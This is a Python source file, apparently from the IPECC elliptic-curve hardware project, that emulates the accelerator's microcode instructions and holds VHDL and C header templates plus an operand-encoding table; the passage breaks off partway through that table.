+{"seq_id":"72218845529","text":"import re, sys, os, math, random\n\nclass bcolors:\n HEADER = '\\033[95m'\n OKBLUE = '\\033[94m'\n OKCYAN = '\\033[96m'\n OKGREEN = '\\033[92m'\n WARNING = '\\033[93m'\n FAIL = '\\033[91m'\n ENDC = '\\033[0m'\n BOLD = '\\033[1m'\n UNDERLINE = '\\033[4m'\n\n\n##########################################################\n### Montgomery related computation\ndef egcd(b, n):\n x0, x1, y0, y1 = 1, 0, 0, 1\n while n != 0:\n q, b, n = b // n, n, b % n\n x0, x1 = x1, x0 - q * x1\n y0, y1 = y1, y0 - q * y1\n return b, x0, y0\ndef modinv(a, m): \n g, x, y = egcd(a, m)\n if g != 1:\n raise Exception(\"Error: modular inverse does not exist\")\n else:\n return x % m\ndef compute_monty_coef(prime, pbitlen):\n \"\"\"\n Compute montgomery coeff r, r^2 and mpinv. 
pbitlen is the size\n of p in bits.\n \"\"\"\n r = (1 << int(pbitlen)) % prime\n r_square = (1 << (2 * int(pbitlen))) % prime\n pinv = (-modinv(prime, r)) % r\n return r, r_square, pinv\n\n### Emulation related stuff\nclass IPECCExecutionContext(object):\n def __init__(self, registers, flags, ip, lrip):\n global OPERANDS_BITS_SIZE\n global BIGNUM_BITS_SIZE\n MEMORY_SIZE = 2**OPERANDS_BITS_SIZE\n self.r = [0] * MEMORY_SIZE\n for (addr, val) in registers:\n if addr >= MEMORY_SIZE:\n print_error(\"Error: \", \"@%d exceeds memory capacity of %d\" % (addr, MEMORY_SIZE), \"(only registers in memory are allowed!)\")\n sys.exit(-1)\n self.r[addr] = val\n self.flags = {\n \"%mu0\" : 0, \n \"%kb0\" : 0, \n \"%par\" : 0, \n \"%kapP\" : 0, \n \"%kap\" : 0,\n # Arithmetic carry flag\n \"%Carith\" : 0,\n # Shift carry flag\n \"%Cshift\" : 0,\n # Zero flag\n \"%Z\" : 0,\n # Strictly negative flag \n \"%SN\" : 0, \n }\n for (f, val) in flags:\n self.flags[f] = val\n # Instruction pointer\n if ip is not None:\n self.ip = ip\n else:\n self.ip = 0\n # Link register\n if lrip is not None:\n self.lrip = lrip\n else:\n self.lrip = 0\n # p constant cached\n self.p = self.r[0]\n # Executed \"line\" in textual form\n self.executed_line = None\n # Masking related stuff\n self.s = [0x0, 0x0, 0x0, 0x0]\n #### Patch related stuff\n #### FIXME: this must be implemented!\n #self.do_blinding = 0\n #self.masklsb = 0\n #self.setup = 0\n #self.laststep = 0\n #self.zu = self.zc = 0\n #self.r0z = self.r1z = 0\n #self.patches = {\n # \"p\" : 0,\n # \"as\" : 0,\n # \"opa\" : { \"x0\" : 0, \"x1\" : 0, \"y0\" : 0, \"y1\" : 0, \"x0next\" : 0, \"x1next\" : 0, \"y0next\" : 0, \"y1next\" : 0, \"x0det\" : 0, \"y0det\" : 0 },\n # \"opb\" : { \"x0\" : 0, \"x1\" : 0, \"y0\" : 0, \"y1\" : 0, \"x0next\" : 0, \"x1next\" : 0, \"y0next\" : 0, \"y1next\" : 0, \"x0det\" : 0, \"y0det\" : 0 },\n # \"opc\" : { \"x1\" : 0, \"y1\" : 0, \"x0next\" : 0, \"x1next\" : 0, \"y0next\" : 0, \"y1next\" : 0, \"blvoid\" : 0, \"copiesopa\" : 0, \"bl0\" : 0, \"bl1\" : 0 },\n #}\n def __str__(self):\n a = \"\\t============== IPECC Execution context ==============\\n\"\n addr = 0\n a += \"\\tMemory: [ \"\n for v in self.r:\n a += \"(%d, %s), \" % (addr, hex(v))\n addr += 1\n a += \" ]\\n\\tFlags: %s\\n\\tIP=0x%x\\n\\tLRIP=0x%x\\n\" % (self.flags, self.ip, self.lrip)\n if self.executed_line is not None:\n a += \"\\t==> %s\\n\" % self.executed_line\n return a\n\ndef apply_patch(execution_context, opa, opb, opc, options):\n for o in options:\n patch_num = None\n # Get the patch\n aa = re.search(r\"p([0-9]+)\", o)\n if aa is not None:\n patch_num = int(aa.group(1))\n if patch_num is None:\n # Nothing to do, return\n return (execution_context, opa, opb, opc)\n else:\n print_error(\"Error: \", \"%s: \" % execution_context.executed_line, \" patch %d is asked, patches are NOT implemented yet!\" % patch_num)\n sys.exit(-1)\n # Nothing to do, return\n return (execution_context, opa, opb, opc)\n\ndef update_arith_flags(C, execution_context, Z=False, SN=False, ODD=False):\n if Z is True:\n # Check if we are 0\n execution_context.flags['%Z'] = int(C == 0)\n if SN is True:\n # If we have produced a negative number set the SN\n execution_context.flags['%SN'] = (C >> (BIGNUM_BITS_SIZE - 1)) & 1\n if ODD is True:\n # Check if we are even or odd\n execution_context.flags['%par'] = (C % 2)\n return execution_context\n\ndef nop_emulate(ins, execution_context):\n # Nop does nothing except increment the ip\n execution_context.ip += 1\n return execution_context\n
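\n# Illustrative sketch (added; not part of the original source): a quick\n# self-check of the Montgomery round-trip that fpredc_emulate below relies on,\n# using a made-up toy prime. Names prefixed with toy_ are assumptions.\ndef _monty_roundtrip_selftest():\n toy_p = 101 # toy prime standing in for the curve prime\n toy_R = 1 << 11 # R > 4*p, mirroring the +4 bits headroom trick\n a, b = 42, 77\n # redc(x) computes x * R^-1 mod p, so two reductions against R^2 undo each other\n redc = lambda x: (x * modinv(toy_R, toy_p)) % toy_p\n assert redc(redc(a * b) * ((toy_R * toy_R) % toy_p)) == (a * b) % toy_p\n\ndef nnadd_emulate(ins, 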
execution_context):\n # Unpack values\n addr, instruction, options, abstract_operands, l = ins\n execution_context.executed_line = l\n # Get the operands\n opa = abstract_operands[0][2]\n opb = abstract_operands[1][2]\n opc = abstract_operands[2][2]\n # Apply the possible patches\n execution_context, opa, opb, opc = apply_patch(execution_context, opa, opb, opc, options)\n # Perform our addition modulo\n A = execution_context.r[opa]\n B = execution_context.r[opb]\n C = (A + B)\n # Do we have to add the carry?\n for o in options:\n if (o == 'X') and (execution_context.flags['%Carith'] == 1):\n C += 1\n # If we have produced a carry set the flag\n if C >= (2**BIGNUM_BITS_SIZE):\n execution_context.flags['%Carith'] = 1\n C = (C % (2**BIGNUM_BITS_SIZE))\n # Update the arithmetic flags\n execution_context = update_arith_flags(C, execution_context, Z=True, SN=True)\n # Result\n execution_context.r[opc] = C\n # Increment IP\n execution_context.ip += 1\n return execution_context\n\ndef nnsub_emulate(ins, execution_context):\n # Unpack values\n addr, instruction, options, abstract_operands, l = ins\n execution_context.executed_line = l\n # Get the operands\n opa = abstract_operands[0][2]\n opb = abstract_operands[1][2]\n opc = abstract_operands[2][2]\n # Apply the possible patches\n execution_context, opa, opb, opc = apply_patch(execution_context, opa, opb, opc, options)\n # Perform our addition modulo\n A = execution_context.r[opa]\n B = execution_context.r[opb]\n C = (A - B)\n # Do we have to add the carry?\n for o in options:\n if (o == 'X') and (execution_context.flags['%Carith'] == 1):\n C += 1\n # Normalize our number in two's complement\n C = (C % (2**BIGNUM_BITS_SIZE))\n # Update the arithmetic flags\n execution_context = update_arith_flags(C, execution_context, Z=True, SN=True)\n # Result\n execution_context.r[opc] = C\n # Increment IP\n execution_context.ip += 1\n return execution_context\n\ndef nnsrl_emulate(ins, execution_context):\n # Unpack values\n addr, instruction, options, abstract_operands, l = ins\n execution_context.executed_line = l\n # Get the operands\n opa = abstract_operands[0][2]\n opb = abstract_operands[1][2]\n opc = abstract_operands[2][2]\n # Apply the possible patches\n execution_context, opa, opb, opc = apply_patch(execution_context, opa, opb, opc, options)\n A = execution_context.r[opa]\n # Do we have to add the carry?\n carry = 0\n for o in options:\n if (o == 'X') and (execution_context.flags['%Cshift'] == 1):\n carry = 1\n if (A & 1):\n execution_context.flags['%Cshift'] = 1\n C = (A >> 1) | (carry << (BIGNUM_BITS_SIZE - 1))\n # Update the arithmetic flags\n execution_context = update_arith_flags(C, execution_context, Z=True)\n execution_context.r[opc] = C\n # Increment IP\n execution_context.ip += 1\n return execution_context\n\ndef nnsll_emulate(ins, execution_context):\n # Unpack values\n addr, instruction, options, abstract_operands, l = ins\n execution_context.executed_line = l\n # Get the operands\n opa = abstract_operands[0][2]\n opb = abstract_operands[1][2]\n opc = abstract_operands[2][2]\n # Apply the possible patches\n execution_context, opa, opb, opc = apply_patch(execution_context, opa, opb, opc, options)\n A = execution_context.r[opa]\n # Do we have to add the carry?\n carry = 0\n for o in options:\n if (o == 'X') and (execution_context.flags['%Cshift'] == 1):\n carry = 1\n if (A >> (BIGNUM_BITS_SIZE - 1)) == 1:\n execution_context.flags['%Cshift'] = 1\n C = (A << 1) % (2**BIGNUM_BITS_SIZE)\n C |= carry\n # Update the arithmetic flags\n 
execution_context = update_arith_flags(C, execution_context, Z=True)\n execution_context.r[opc] = C\n # Increment IP\n execution_context.ip += 1\n return execution_context\n\ndef nnrnd_emulate(ins, execution_context):\n # Unpack values\n addr, instruction, options, abstract_operands, l = ins\n execution_context.executed_line = l\n # Get the operands\n opa = abstract_operands[0][2]\n opb = abstract_operands[1][2]\n opc = abstract_operands[2][2]\n # Apply the possible patches\n execution_context, opa, opb, opc = apply_patch(execution_context, opa, opb, opc, options)\n C = random.randrange(0, 2**BIGNUM_BITS_SIZE)\n execution_context.r[opc] = C\n # Update the arithmetic flags\n execution_context = update_arith_flags(C, execution_context, Z=True)\n # Increment IP\n execution_context.ip += 1\n return execution_context\n\ndef testpars_emulate(ins, execution_context):\n # Unpack values\n addr, instruction, options, abstract_operands, l = ins\n execution_context.executed_line = l\n # Get operands\n opa = abstract_operands[0][2]\n opb = abstract_operands[1][2]\n opc = abstract_operands[2][2]\n opc_name = abstract_operands[2][1]\n # Apply the possible patches\n execution_context, opa, opb, opc = apply_patch(execution_context, opa, opb, opc, options)\n # Test the parity of opa and update the flag\n A = execution_context.r[opa]\n execution_context.flags[opc_name] = (A % 2)\n # Increment IP\n execution_context.ip += 1\n return execution_context\n\ndef nnxor_emulate(ins, execution_context):\n # Unpack values\n addr, instruction, options, abstract_operands, l = ins\n execution_context.executed_line = l\n # Get the operands\n opa = abstract_operands[0][2]\n opb = abstract_operands[1][2]\n opc = abstract_operands[2][2]\n # Apply the possible patches\n execution_context, opa, opb, opc = apply_patch(execution_context, opa, opb, opc, options)\n # Perform our exclusive or\n A = execution_context.r[opa]\n B = execution_context.r[opb]\n C = (A ^ B)\n # Result\n execution_context.r[opc] = C\n # Increment IP\n execution_context.ip += 1\n return execution_context\n\ndef fpredc_emulate(ins, execution_context):\n # Unpack values\n addr, instruction, options, abstract_operands, l = ins\n execution_context.executed_line = l\n # Get the operands\n opa = abstract_operands[0][2]\n opb = abstract_operands[1][2]\n opc = abstract_operands[2][2]\n # Apply the possible patches\n execution_context, opa, opb, opc = apply_patch(execution_context, opa, opb, opc, options)\n # Perform our Montgomery multiplication\n A = execution_context.r[opa]\n B = execution_context.r[opb]\n pbitlen = getbitlen(execution_context.p)\n # NOTE: we add 4 bits for the Monty trick using R > 4p\n # for the 0 < u, v, w < 2p invariant\n MontyR = 2**(BIGNUM_BITS_SIZE + 4)\n C = (A * B * modinv(MontyR, execution_context.p)) % execution_context.p\n # Result\n execution_context.r[opc] = C\n # Increment IP\n execution_context.ip += 1\n return execution_context\n\ndef testpar_emulate(ins, execution_context):\n # Unpack values\n addr, instruction, options, abstract_operands, l = ins\n execution_context.executed_line = l\n # Get the operands\n opa = abstract_operands[0][2]\n opb = abstract_operands[1][2]\n opc = abstract_operands[2][2]\n opc_name = abstract_operands[2][1]\n # Apply the possible patches\n execution_context, opa, opb, opc = apply_patch(execution_context, opa, opb, opc, options)\n # Test the parity of opa and update the flag\n A = execution_context.r[opa]\n execution_context.flags[opc_name] = (A % 2)\n # Increment IP\n execution_context.ip += 1\n return execution_context\n
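\n# Illustrative sketch (added; not part of the original source): how the 'X'\n# option chains carries across limbs. The register numbers and ins tuples below\n# are made up for the demo; call this only after the module constants\n# (BIGNUM_BITS_SIZE, OPERANDS_BITS_SIZE) defined further down have been loaded.\ndef _carry_chain_selftest():\n ctx = IPECCExecutionContext([(1, (1 << BIGNUM_BITS_SIZE) - 1), (2, 1)], [], None, None)\n # r4 = r1 + r2 wraps to 0 and raises %Carith\n ctx = nnadd_emulate((0, 'NNADD', [], [(None, None, 1), (None, None, 2), (None, None, 4)], 'NNADD r1,r2,r4'), ctx)\n # r5 = r3 + r3 + carry = 1, completing a double-width addition\n ctx = nnadd_emulate((1, 'NNADD', ['X'], [(None, None, 3), (None, None, 3), (None, None, 5)], 'NNADD,X r3,r3,r5'), ctx)\n assert ctx.r[4] == 0 and ctx.r[5] == 1\n\ndef nnrndm_emulate(ins, execution_context):\n # Unpack values\n 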
addr, instruction, options, abstract_operands, l = ins\n execution_context.executed_line = l\n # Get the operand\n opa = abstract_operands[0][2]\n opb = abstract_operands[1][2]\n opc = abstract_operands[2][2]\n # Apply the possible patches\n execution_context, opa, opb, opc = apply_patch(execution_context, opa, opb, opc, options)\n # NOTE: (BIGNUM_BITS_SIZE - 1) truncation for NNRNDM to\n # ensure the random result is < p\n C = random.randrange(0, 2**(BIGNUM_BITS_SIZE - 1))\n execution_context.r[opc] = C\n # Update the arithmetic flags\n execution_context = update_arith_flags(C, execution_context, Z=True)\n # Increment IP\n execution_context.ip += 1\n return execution_context\n\ndef nndiv2_emulate(ins, execution_context):\n # Unpack values\n addr, instruction, options, abstract_operands, l = ins\n execution_context.executed_line = l\n # Get the operands\n opa = abstract_operands[0][2]\n opb = abstract_operands[1][2]\n opc = abstract_operands[2][2]\n # Apply the possible patches\n execution_context, opa, opb, opc = apply_patch(execution_context, opa, opb, opc, options)\n A = execution_context.r[opa]\n # Save the sign\n sign = (A >> (BIGNUM_BITS_SIZE - 1)) & 0x1\n C = (A >> 1) | (sign << (BIGNUM_BITS_SIZE - 1))\n execution_context.r[opc] = C\n # Update the arithmetic flags\n execution_context = update_arith_flags(C, execution_context, Z=True)\n # Increment IP\n execution_context.ip += 1\n return execution_context\n\ndef nnrnds_emulate(ins, execution_context):\n # Unpack values\n addr, instruction, options, abstract_operands, l = ins\n execution_context.executed_line = l\n # Get the operands\n opa = abstract_operands[0][2]\n opb = abstract_operands[1][2]\n opc = abstract_operands[2][2]\n # Apply the possible patches\n execution_context, opa, opb, opc = apply_patch(execution_context, opa, opb, opc, options)\n # Generate our mask\n s_num = int(opb)\n execution_context.s[s_num] = random.randrange(0, 2**BIGNUM_BITS_SIZE)\n # Put the mask in the opc operand\n C = execution_context.s[s_num]\n execution_context.r[opc] = C\n # Update the arithmetic flags\n execution_context = update_arith_flags(C, execution_context, Z=True)\n # Increment IP\n execution_context.ip += 1\n return execution_context\n\ndef nnrndf_emulate(ins, execution_context):\n # Unpack values\n addr, instruction, options, abstract_operands, l = ins\n execution_context.executed_line = l\n # Get the operands\n opa = abstract_operands[0][2]\n opb = abstract_operands[1][2]\n opc = abstract_operands[2][2]\n # Apply the possible patches\n execution_context, opa, opb, opc = apply_patch(execution_context, opa, opb, opc, options)\n # Generate our mask\n s_num = int(opb)\n execution_context.s[s_num] = random.randrange(0, 2**BIGNUM_BITS_SIZE)\n # Put the mask in the opc operand\n execution_context.r[opc] = execution_context.s[s_num]\n # Increment IP\n execution_context.ip += 1\n return execution_context\n\ndef nnsrls_emulate(ins, execution_context):\n # Unpack values\n addr, instruction, options, abstract_operands, l = ins\n execution_context.executed_line = l\n # Get the operands\n opa = abstract_operands[0][2]\n opb = abstract_operands[1][2]\n opc = abstract_operands[2][2]\n # Apply the possible patches\n execution_context, opa, opb, opc = apply_patch(execution_context, opa, opb, opc, options)\n A = execution_context.r[opa] \n s_num = int(opb)\n # Unmask our value\n A = (A ^ execution_context.s[s_num])\n # Do we have to add the carry?\n carry = 0\n for o in options:\n if (o == 'X') and (execution_context.flags['%Cshift'] == 1):\n carry = 1\n if (A & 1):\n 
execution_context.flags['%Cshift'] = (1 ^ (execution_context.s[s_num] & 0x1))\n C = (A >> 1) | (carry << (BIGNUM_BITS_SIZE - 1))\n # Shift our mask\n execution_context.s[s_num] = execution_context.s[s_num] >> 1\n # Mask our result value\n C = (C ^ execution_context.s[s_num])\n execution_context.r[opc] = C\n # Update the arithmetic flags\n execution_context = update_arith_flags(C, execution_context, Z=True)\n # Increment IP\n execution_context.ip += 1\n return execution_context\n\ndef j_emulate(ins, execution_context):\n # Unpack values\n addr, instruction, options, abstract_operands, l = ins\n execution_context.executed_line = l\n # Jump to our target\n imm = abstract_operands[0][2]\n execution_context.ip = imm\n return execution_context\n\ndef jz_emulate(ins, execution_context):\n # Unpack values\n addr, instruction, options, abstract_operands, l = ins\n execution_context.executed_line = l\n # Jump to our target only if '%Z' is set\n if execution_context.flags['%Z'] == 1:\n imm = abstract_operands[0][2]\n execution_context.ip = imm\n else:\n execution_context.ip += 1\n return execution_context\n\ndef jsn_emulate(ins, execution_context):\n # Unpack values\n addr, instruction, options, abstract_operands, l = ins\n execution_context.executed_line = l\n # Jump to our target only if '%SN' is set\n if execution_context.flags['%SN'] == 1:\n imm = abstract_operands[0][2]\n execution_context.ip = imm\n else:\n execution_context.ip += 1\n return execution_context\n\ndef jodd_emulate(ins, execution_context):\n # Unpack values\n addr, instruction, options, abstract_operands, l = ins\n execution_context.executed_line = l\n # Jump to our target only if '%par' is set\n if execution_context.flags['%par'] == 1:\n imm = abstract_operands[0][2]\n execution_context.ip = imm\n else:\n execution_context.ip += 1\n return execution_context\n\ndef jkap_emulate(ins, execution_context):\n # Unpack values\n addr, instruction, options, abstract_operands, l = ins\n execution_context.executed_line = l\n # Jump to our target only if '%kap' is set\n if execution_context.flags['%kap'] == 1:\n imm = abstract_operands[0][2]\n execution_context.ip = imm\n else:\n execution_context.ip += 1\n return execution_context\n\ndef jl_emulate(ins, execution_context):\n # Unpack values\n addr, instruction, options, abstract_operands, l = ins\n execution_context.executed_line = l\n # Jump with link\n imm = abstract_operands[0][2]\n execution_context.lrip = execution_context.ip + 1\n execution_context.ip = imm\n return execution_context\n\ndef jlsn_emulate(ins, execution_context):\n # Unpack values\n addr, instruction, options, abstract_operands, l = ins\n execution_context.executed_line = l\n # Jump with link to our target only if 'SN' is set\n if execution_context.flags['%SN'] == 1:\n imm = abstract_operands[0][2]\n execution_context.lrip = execution_context.ip + 1\n execution_context.ip = imm\n else:\n execution_context.ip += 1\n return execution_context\n\ndef ret_emulate(ins, execution_context):\n # Unpack values\n addr, instruction, options, abstract_operands, l = ins\n execution_context.executed_line = l\n # Return to lrip\n execution_context.ip = execution_context.lrip\n return execution_context\n\ndef barrier_emulate(ins, execution_context):\n # Unpack values\n addr, instruction, options, abstract_operands, l = ins\n execution_context.executed_line = l\n # Nothing to do here, we do not\n # increment ip\n return execution_context\n\ndef stop_emulate(ins, execution_context):\n # Unpack values\n addr, instruction, options, 
abstract_operands, l = ins\n execution_context.executed_line = l\n # Nothing to do here, we do not\n # increment ip\n return execution_context\n\n\n## VHDL files creation headers and footers\n##########################################################\necc_curve_iram_begin =r\"\"\"\n-- -------------------------------------------------------\n-- This file is automatically generated through scripting\n-- -------------------------------------------------------\n\nlibrary ieee;\nuse ieee.std_logic_1164.all;\nuse ieee.numeric_std.all;\n\nuse work.ecc_customize.all; -- for debug & nbopcodes parameters\nuse work.ecc_utils.all; -- for function ge_pow_of_2\nuse work.ecc_pkg.all; -- for IRAM_ADDR_SZ & OPCODE_SZ parameters\n\n-- code below conforms to Xilinx's synthesis recommandations for\n-- VHDL coding style of a simple dual-port BRAM with _two_clocks_\n-- (see Vivado Design Suite User Guide, Synthesis, UG901, v2014.1,\n-- May 1, 2014, pp. 105-106)\n-- except that it describes a two-cycle delay on the read data path.\n-- Depending on the FPGA vendor/family device target, an extra-layer of\n-- register may be present inside the Block-RAM providing such 2-cycle\n-- latency, as it leads to better timing performance (at the cost of\n-- a small increase in the Block-RAM area).\n-- In this case it is best for area performance to ensure that the\n-- extra register layer on the read data path is held back inside\n-- the Block-RAM by back-end tools\nentity ecc_curve_iram is\n\tgeneric(\n\t\trdlat : positive range 1 to 2 := 2);\n\tport(\n\t\t-- port A: write-only interface to AXI-lite interface\n\t\tclka : in std_logic;\n\t\twea : in std_logic;\n\t\taddra : in std_logic_vector(IRAM_ADDR_SZ - 1 downto 0);\n\t\tdia : in std_logic_vector (OPCODE_SZ - 1 downto 0);\n\t\t-- port B: read-only interface to ecc_curve\n\t\tclkb : in std_logic;\n\t\treb : in std_logic;\n\t\taddrb : in std_logic_vector (IRAM_ADDR_SZ - 1 downto 0);\n\t\tdob : out std_logic_vector (OPCODE_SZ - 1 downto 0)\n\t);\nend entity ecc_curve_iram;\n\narchitecture syn of ecc_curve_iram is\n\n\tsubtype std_logic_opcode is std_logic_vector(OPCODE_SZ - 1 downto 0);\n\ttype mem_content_type is array(integer range 0 to ge_pow_of_2(nbopcodes) - 1)\n\t\tof std_logic_opcode;\n\tshared variable mem_content : mem_content_type := (\n\t\t-- content of static memory automatically written below through scripting\n\t\t--\n\t\t-- opcode in binary format address opcode in hex\n\t\t-- <-----------------------------> <---------> <---------->\n\"\"\"\n\necc_curve_iram_end = r\"\"\"\n\t\tothers => (others => '0')\n\t);\n\tsignal predoutb : std_logic_opcode;\n\nbegin\n\n\t-- ---------------------------------------------\n\t-- Port A (W only) is only present in debug mode\n\t-- ---------------------------------------------\n\td0: if debug generate -- statically resolved by synthesizer\n\t\tprocess(clka)\n\t\tbegin\n\t\t\tif (clka'event and clka = '1') then\n\t\t\t\t-- write logic\n\t\t\t\t-- (in simulation, only affects array content if no METAVALUE in addra)\n\t\t\t\t-- otherwise issue a WARNING message\n\t\t\t\tif (wea = '1') then\n\t\t\t\t\tassert(not is_X(addra))\n\t\t\t\t\t\treport \"write to ecc_curve_iram with a METAVALUE address\"\n\t\t\t\t\t\t\tseverity WARNING;\n\t\t\t\t\tmem_content(to_integer(unsigned(addra))) := dia;\n\t\t\t\tend if;\n\t\t\tend if;\n\t\tend process;\n\tend generate;\n\n\t-- --------------------------------------------------------------\n\t-- Port B (R only) is the nominal port used by ecc_curve to fetch\n\t-- instructions (which makes 
ecc_curve_iram a ROM when debug mode\n\t-- is not activated)\n\t-- --------------------------------------------------------------\n\tr1 : if rdlat = 1 generate -- statically resolved by synthesizer\n\t\tprocess(clkb)\n\t\tbegin\n\t\t\tif (clkb'event and clkb = '1') then\n\t\t\t\t-- read logic\n\t\t\t\t-- (in simulation returns 'force unknown' ('X') if METAVALUE in addrb)\n\t\t\t\tif (reb = '1') then\n\t\t\t\t\t-- pragma translate_off\n\t\t\t\t\tif is_X(addrb) then\n\t\t\t\t\t\tdob <= (others => 'X');\n\t\t\t\t\telse\n\t\t\t\t\t-- pragma translate_on\n\t\t\t\t\t\tdob <= mem_content(to_integer(unsigned(addrb)));\n\t\t\t\t\t-- pragma translate_off\n\t\t\t\t\tend if;\n\t\t\t\t\t-- pragma translate_on\n\t\t\t\tend if;\n\t\t\tend if;\n\t\tend process;\n\tend generate;\n\n\tr2 : if rdlat = 2 generate -- statically resolved by synthesizer\n\t\tprocess(clkb)\n\t\tbegin\n\t\t\tif (clkb'event and clkb = '1') then\n\t\t\t\tif (reb = '1') then\n\t\t\t\t\t-- pragma translate_off\n\t\t\t\t\tif is_X(addrb) then\n\t\t\t\t\t\tdob <= (others => 'X');\n\t\t\t\t\telse\n\t\t\t\t\t-- pragma translate_on\n\t\t\t\t\t\tpredoutb <= mem_content(to_integer(unsigned(addrb)));\n\t\t\t\t\t-- pragma translate_off\n\t\t\t\t\tend if;\n\t\t\t\t\t-- pragma translate_on\n\t\t\t\tend if;\n\t\t\t\tdob <= predoutb;\n\t\t\tend if;\n\t\tend process;\n\tend generate;\n\nend architecture syn;\n\"\"\"\n\necc_addr_begin = r\"\"\"\n-- -------------------------------------------------------\n-- This file is automatically generated through scripting\n-- -------------------------------------------------------\n\nlibrary ieee;\nuse ieee.std_logic_1164.all;\nuse ieee.numeric_std.all;\n\nuse work.ecc_pkg.all;\n\npackage ecc_addr is\n\n\"\"\"\n\necc_addr_end = r\"\"\"\n\nend package ecc_addr;\n\"\"\"\n\necc_addr_h_begin = r\"\"\"\n/**********************************************************\n * This file is automatically generated through scripting *\n **********************************************************/\n\n#ifndef __ECC_ADDR_H__\n#define __ECC_ADDR_H__\n\n/* Nominal symbols\n *\n * (main FSM of ecc_scalar uses these addresses\n * to run microcode routines).\n */\n\"\"\"\n\necc_addr_h_middle = r\"\"\"\n/* Debug symbols\n *\n * (these addresses can be used by the software driver\n * to break on specific useful steps of the microcode,\n * when in debug mode).\n */\n\"\"\"\n\necc_addr_h_end = r\"\"\"\n#endif /* __ECC_ADDR_H__ */\n\"\"\"\n\n\n#####################################################\n#####################################################\n\ndef key_words_regexp(l):\n ret = \"\"\n i = 0\n for k in l:\n ret += k\n i += 1\n if i != len(l):\n ret += \"|\"\n return ret\n\n# Default values, updated when read from\n# VHDL files\nBIGNUM_BITS_SIZE = 528\nOPERANDS_BITS_SIZE = 5\nPATCH_BITS_SIZE = 6\nIMMEDIATE_BITS_SIZE = 9\nCONSTANTS_BITS_SIZE = 2\nOPCODE_BITS_SIZE = 4\nOPCODE_CLASS_BITS_SIZE = 2\nipecc_operands_dict = {\n\t\"p\": \"00000\",\n\t\"a\": \"00001\",\n\t\"b\": \"00010\",\n\t\"q\": \"00011\",\n\t\"k\": \"00100\",\n\t\"XR1\": \"00110\",\n\t\"YR1\": \"00111\",\n\t\"XR0\": \"00100\",\n\t\"YR0\": \"00101\",\n\t\"ZR01\": \"11010\",\n\t\"one\": \"11110\",\n\t\"zero\": \"11111\",\n\t\"R\": \"11101\",\n\t\"kb0\": \"00100\",\n\t\"kb1\": \"00101\",\n\t\"phi0\": \"01010\",\n\t\"phi1\": \"01011\",\n\t\"kap0\": \"01100\",\n\t\"kap1\": \"01101\",\n\t\"kapP0\": \"01110\",\n\t\"kapP1\": \"01111\",\n\t\"R2modp\": \"10011\",\n\t\"XPBK\": \"11011\",\n\t\"YPBK\": \"11100\",\n\t\"ZPBK\": \"10110\",\n\t\"inverse\": \"10101\",\n\t\"dtmp\": 
\"10100\",\n\t\"XmXU\": \"01000\",\n\t\"twop\": \"11000\",\n\t\"red\": \"10110\",\n\t\"dy1\": \"01111\",\n\t\"dy2\": \"10000\",\n\t\"dx1\": \"10111\",\n\t\"dx2\": \"10001\",\n\t\"du\": \"11001\",\n\t\"dv\": \"11010\",\n\t\"dx\": \"11011\",\n\t\"dy\": \"11100\",\n\t\"r0\": \"11001\",\n\t\"r1\": \"11010\",\n\t\"two\": \"10111\",\n\t\"pmtwo\": \"10001\",\n\t\"idx\": \"01111\",\n\t\"aX\": \"01111\",\n\t\"right\": \"01111\",\n\t\"mustbezero\": \"10101\",\n\t\"YY\": \"10000\",\n\t\"left\": \"10000\",\n\t\"XX\": \"10001\",\n\t\"XXX\": \"10001\",\n\t\"XR\": \"10001\",\n\t\"R3modp\": \"10100\",\n\t\"mu0\": \"11010\",\n\t\"mu1\": \"11011\",\n\t\"kap0msk\": \"01000\",\n\t\"kap1msk\": \"01001\",\n\t\"kapP0msk\": \"10000\",\n\t\"kapP1msk\": \"10001\",\n\t\"phi0msk\": \"10100\",\n\t\"phi1msk\": \"10101\",\n\t\"qsh0\": \"01000\",\n\t\"qsh1\": \"01001\",\n\t\"btmp0\": \"01010\",\n\t\"btmp1\": \"01011\",\n\t\"alf\": \"01100\",\n\t\"m0\": \"01010\",\n\t\"m1\": \"01011\",\n\t\"alfmsk\": \"01111\",\n\t\"ZZ\": \"01000\",\n\t\"ZZZZ\": \"01000\",\n\t\"aZZZZ\": \"01000\",\n\t\"2YR1\": \"01000\",\n\t\"M\": \"01001\",\n\t\"MpSmT\": \"01001\",\n\t\"Q\": \"01001\",\n\t\"YYYY\": \"10000\",\n\t\"QQ\": \"10000\",\n\t\"S\": \"10001\",\n\t\"SmT\": \"10001\",\n\t\"X1YY\": \"10010\",\n\t\"lambdasq\": \"10110\",\n\t\"MM\": \"10110\",\n\t\"lambda\": \"10101\",\n\t\"lambdacu\": \"10101\",\n\t\"Y1Z1\": \"10101\",\n\t\"A\": \"01000\",\n\t\"BmX\": \"01000\",\n\t\"W\": \"01000\",\n\t\"F\": \"01000\",\n\t\"C\": \"01001\",\n\t\"CmB\": \"01001\",\n\t\"BpC\": \"01001\",\n\t\"H\": \"01001\",\n\t\"J\": \"01001\",\n\t\"YmY\": \"10000\",\n\t\"G\": \"10100\",\n\t\"D\": \"10001\",\n\t\"DmB\": \"10001\",\n\t\"Xtmp\": \"10100\",\n\t\"Ytmp\": \"10101\",\n\t\"XmXC\": \"10101\",\n\t\"YpY\": \"10100\",\n\t\"B\": \"10111\",\n\t\"A1\": \"11001\",\n\t\"CCmB\": \"11001\",\n\t\"XSUB\": \"01000\",\n\t\"YSUB\": \"10000\",\n\t\"XR0tmp\": \"10000\",\n\t\"YR0tmp\": \"10001\",\n\t\"ZPBKsq\": \"01110\",\n\t\"ZPBKcu\": \"01110\",\n\t\"ZR01sq\": \"10101\",\n\t\"ZR01cu\": \"10101\",\n\t\"ZR01END\": \"11001\",\n\t\"XR1tmp\": \"10110\",\n\t\"YR1tmp\": \"10100\",\n\t\"invsq\": \"01010\",\n\t\"invcu\": \"01011\",\n\t\"patchme\": \"10101\",\n\t\"HH\": \"01010\",\n\t\"tHH\": \"01010\",\n\t\"Ia\": \"01010\",\n\t\"I\": \"01100\",\n\t\"Ja\": \"01001\",\n\t\"r\": \"01011\",\n\t\"V\": \"01010\",\n\t\"rsq\": \"01100\",\n\t\"JpV\": \"01101\",\n\t\"Jp2V\": \"01101\",\n\t\"YmJ\": \"01001\",\n\t\"tYmJ\": \"01001\",\n\t\"VmX\": \"01010\",\n\t\"rVmX\": \"01010\",\n\t\"XR0bk\": \"01110\",\n\t\"YR0bk\": \"01111\",\n\t\"XR1bk\": \"11100\",\n\t\"YR1bk\": \"01100\",\n \"XADD\": \"10001\",\n \"K\": \"10000\",\n \"YADD\": \"10000\",\n 